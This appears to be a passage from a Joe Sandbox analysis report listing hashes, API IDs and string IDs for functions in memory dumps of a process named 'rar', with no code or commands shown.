                                                            • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                            • Instruction ID: ede7ced57b9ed69b92e8542f07b1bc823a78225c277a1c854208bdc0ba0e8568
                                                            • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                            • Instruction Fuzzy Hash: 58313B72F18A51C9FB00DFB4D8901ACB771FB08799B54502ADE0E97A58EB38D499C710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: exe$rar$rebuilt.$sfx
                                                            • API String ID: 0-13699710
                                                            • Opcode ID: 8e3ebe7a8d66413e607fdcd4a757441faa1c7bec7dcda609089eab4bf309717e
                                                            • Instruction ID: c0db9e6e87fa74c7e87f067f4048f2b8a6792dd37261e52c9a3812035df79e9d
                                                            • Opcode Fuzzy Hash: 8e3ebe7a8d66413e607fdcd4a757441faa1c7bec7dcda609089eab4bf309717e
                                                            • Instruction Fuzzy Hash: 8A819831A0CE8285EA20FB25D4112F9A391FF897A4FC44535D96D176CAFE6DE60DCB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CurrentImageNonwritableUnwindabort
                                                            • String ID: csm$f
                                                            • API String ID: 3913153233-629598281
                                                            • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                            • Instruction ID: 4f9700873264c809865f7145eb8706c5c417e60a06aa60b8c83323a676fe3299
                                                            • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                            • Instruction Fuzzy Hash: 6761BE36B0DA42C6EB18FB15E440A79E795FB44BE4F948538DE1A17744EF38E8498B30
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Security$File$DescriptorLength
                                                            • String ID: $ACL
                                                            • API String ID: 2361174398-1852320022
                                                            • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                            • Instruction ID: 2a8a9d31519d9625086a7ad01e0fcfcff218190b1520ccc39ee52252f5ac0a62
                                                            • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                            • Instruction Fuzzy Hash: 7B315171A1DE8192E620EB11E4543EAE7A5FB88794FC04035DA9D43696FF3CE609CF50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                            • String ID: CompareStringOrdinal$kernel32.dll
                                                            • API String ID: 2522007465-2120454788
                                                            • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                            • Instruction ID: 84e0d893cb0d8b15246af9b1cc1088bc69040eb99313969f9dc0cb7efd2ba7f3
                                                            • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                            • Instruction Fuzzy Hash: B7219431E0DF42C5EA14BB11A940174E291BF44BA0FD84139EA6D47694FFACE24D8B20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$swprintf$LocalSystem
                                                            • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                            • API String ID: 1364621626-1794493780
                                                            • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                            • Instruction ID: 46131f2a39616e24af89422804701942f69eb4a5270f5e0816d1ce4f1cfe44db
                                                            • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                            • Instruction Fuzzy Hash: EF21F976E186418EE760DF64D480A9DB7F0F748794F944436EE5893B48EB38E9498F20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                            • Instruction ID: 6ff72bb0f853693850d9f18b4f0ed27ecbeb2970ea504098c57de6c97cb8602d
                                                            • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                            • Instruction Fuzzy Hash: CAF03175A1DE42C1EA45AB11F491279E361AF887A4F84103DEA4F46654FE3CD54C8A20
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                            • Instruction ID: f384bcfdcda129ee19b31e2d9f1b81fa2cf13ad646174824ce349cb183d19c4f
                                                            • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                            • Instruction Fuzzy Hash: A6A1B472B0CB83C6EB61AB6094503B9E691AF44BB4F984639DA5D067C5FF7CD44C8B20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                            • Instruction ID: debe2996bda5a17badccd1bdb8f8748dfcef42eee1185f0e3671818f563fc3d5
                                                            • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                            • Instruction Fuzzy Hash: 018193B2E1CE13D5FB21AB6594806BDE6A0BB44B64F884139DD0E13795EF3C944ECB20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 3659116390-0
                                                            • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                            • Instruction ID: 8cbe7ecc874a853a6efe7cb9e70719aab602fb1f4129297ff61a0c3c13544d4b
                                                            • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                            • Instruction Fuzzy Hash: BB51C672A18E52C6EB11DF65D4443ACFB70BB447A8F584139DE4E47698EF38D14ACB20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                            • String ID:
                                                            • API String ID: 643171463-0
                                                            • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                            • Instruction ID: e1a2936362b95ebb7f677710f780810eb64629e8c097ae0877d54a0c661a69b2
                                                            • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                            • Instruction Fuzzy Hash: E241D671E1CE4282E920BB21A9012B9E291AF45BB0F844339DE7D176D5FE7CE54DCB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                            • Instruction ID: af664cf9af3df472091cef9f68db4ebe0b4582d2452837198d490d300a5870dc
                                                            • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                            • Instruction Fuzzy Hash: A641C071B0DE02D1EA51AB86A800575E291BF08BB0F89853CDD5D4B784FE3CE00CDB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                            • Instruction ID: ac8fdba5e3a328785a178e77400ca04bd7d0ea566ebc4952aa27417034e5f03b
                                                            • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                            • Instruction Fuzzy Hash: AD118232E1CE0385F658312CF48A37AD1416F96370F845E3CE96E466D6FEACA4484A20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: wcschr$BeepMessage
                                                            • String ID: ($[%c]%ls
                                                            • API String ID: 1408639281-228076469
                                                            • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                            • Instruction ID: cc12a99d203a259e41657c1cb060e535d71ef7b7686ab4bcb81bfd4a5a2f76b6
                                                            • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                            • Instruction Fuzzy Hash: A981C432A1CE4182EE60EF15E4402BAE7A0FB84B98F940035EA5E47759FF7CE549CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                            • API String ID: 233258989-622958660
                                                            • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                            • Instruction ID: ac8539bf93731dd87bc053c5acd49409a96c7693653031637f4456a539aecff4
                                                            • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                            • Instruction Fuzzy Hash: 585150F3F3C9848AE7544F1CE841BA96650F364BA1F945A28F55A93B84D63DDB488B00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
